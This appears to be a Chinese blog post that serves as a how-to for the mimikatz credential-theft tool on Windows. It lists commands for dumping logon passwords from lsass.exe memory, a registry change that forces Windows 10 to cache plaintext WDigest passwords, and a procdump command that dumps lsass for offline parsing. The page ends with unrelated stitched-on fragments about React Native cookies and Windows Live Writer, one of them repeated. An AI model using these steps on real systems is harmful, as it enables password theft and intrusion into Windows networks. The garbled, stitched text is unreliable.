mimikatz windows使用指南

2021-10-09 20:52:05 字數 2266 閱讀 5049

一.程式原理

獲取到記憶體檔案 lsass.exe 程序 (它用於本地安全和登陸策略) 中儲存的明文登入密碼。

二.指令介紹

version檢視mimikatz的版本

system::user檢視當前登入的系統使用者

system::computer檢視計算機名稱

process::list列出程序

process::suspend程序名稱暫停程序

process::stop程序名稱結束程序

process::modules列出系統的核心模組及所在位置

service::list列出系統的服務

service::remove移除系統的服

service::remove移除系統的服務

service::startstop服務名稱啟動或停止服務

privilege::list列出許可權列表

privilege::enable啟用乙個或多個許可權

privilege::debug提公升許可權

nogpo::cmd開啟系統的cmd.exe

nogpo::regedit開啟系統的登錄檔

nogpo::taskmgr開啟任務管理器

ts::sessions顯示當前的會話

ts::processes顯示程序和對應的pid情況等

sekurlsa::wdigest獲取本地使用者資訊及密碼

sekurlsa::wdigest獲取kerberos使用者資訊及密碼

sekurlsa::tspkg獲取tspkg使用者資訊及密碼

sekurlsa::logonpasswords獲登陸使用者資訊及密碼

三.使用過程1.win10以下本次以實驗win7為例

① 右鍵使用管理員身份開啟

2.win10在win10內禁止在記憶體快取中儲存明文密碼

因此可以通過修改登錄檔選項,恢復明文密碼

(1)方法一:

① 管理員身份執行cmd

② 修改登錄檔

修改完之後,重新登入賬號,此時抓出來的密碼就是明文顯示

命令:reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v uselogoncredential /t reg_dword /d 1 /f

shutdown -r -t 0
④ 管理員身份執行mimikatz

⑤ 輸入命令,獲取密碼

(2)方法二:

① 修改登錄檔(與方法一基本相同)

shutdown -r -t 0

③ 使用程式procdump抓取dup檔案

使用管理員身份開啟cmd 並在程式的目錄開啟procdump.exe

命令:procdump64.exe -accepteula -ma lsass.exe 1.dmp

④ 在通過mimikatz解析1.dup檔案

注:mimikatz已經整合至metasploit』s meterpreter,在kali中也可使用

參考文章:

網路資訊保安-plo

React Native Cookie使用指南

web開發中,cookie是乙個常用工具。通常會將使用者與伺服器會話的sessionid儲存在cookie中,用以在請求中標示會話 或者將登入態token值儲存在cookie中,請求中通過cookie值校驗登入態。當我們使用react native開發應用時,是否還能像在web開發中那樣使用cook...

Windows Live Writer 使用指南

一 簡介 二 安裝配置 指定安裝目錄進行安裝,方法如下 mklink d c program files x86 windows live e microsoft windows live mklink d f 我的文件 my weblog posts f 我的博文 三 新增賬戶 1 賬戶 2 cs...

Windows Live Writer 使用指南

一 簡介 二 安裝配置 指定安裝目錄進行安裝,方法如下 mklink d c program files x86 windows live e microsoft windows live mklink d f 我的文件 my weblog posts f 我的博文 三 新增賬戶 1 賬戶 2 cs...